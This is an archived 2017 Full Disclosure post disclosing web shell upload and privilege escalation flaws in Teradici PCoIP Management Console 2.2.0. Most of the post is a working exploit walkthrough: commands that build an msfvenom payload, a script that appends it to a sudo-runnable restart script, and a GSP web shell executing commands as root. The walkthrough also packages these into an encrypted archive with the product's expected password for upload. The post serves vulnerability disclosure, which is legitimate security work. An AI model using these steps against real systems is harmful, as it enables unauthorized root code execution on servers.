| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 22 Feb 2017 08:26:18 +0000 From: Harrison Neal <hneal@...tdidibreak.com> To: fulldisclosure@...lists.org Subject: [FD] Teradici Management Console 2.2.0 - Privilege Escalation # Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation # Date: February 22nd, 2017 # Exploit Author: hantwister # Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console # Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required) # Version: 2.2.0 Users that can access the Settings > Database Management page can achieve code execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64) Web Shell Upload Vulnerability Overview --------------------------------------- Database archives are extracted under /opt/jetty/tmpdeploy. By creating a malicious archive with a malicious web script that extracts to the known directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any- it is possible to add or modify class files and XML files pertaining to the application. Privilege Escalation Vulnerability Overview ------------------------------------------- The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user has sudo rights to run that file without a password. By manipulating this file, arbitrary code can be run as root. Exploiting The Vulnerabilities ------------------------------ alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images alice:~$ cd runasroot alice:~/runasroot$ msfvenom (snip) > evil alice:~/runasroot$ chmod a+x evil alice:~/runasroot$ nano modify_self_restart.sh #!/bin/bash echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh alice:~/runasroot$ chmod a+x modify_self_restart.sh alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp <html> <head> <title>runasroot</title> </head> <body> <pre> <% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %> <% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %> <% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %> </pre> </body> </html> alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../.. alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any- alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p Now, choose to upload runasroot.archive through the Database Management page. An error will be displayed that it wasn't a valid archive. Now, navigate to https://IP/console/images/runasroot.gsp _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists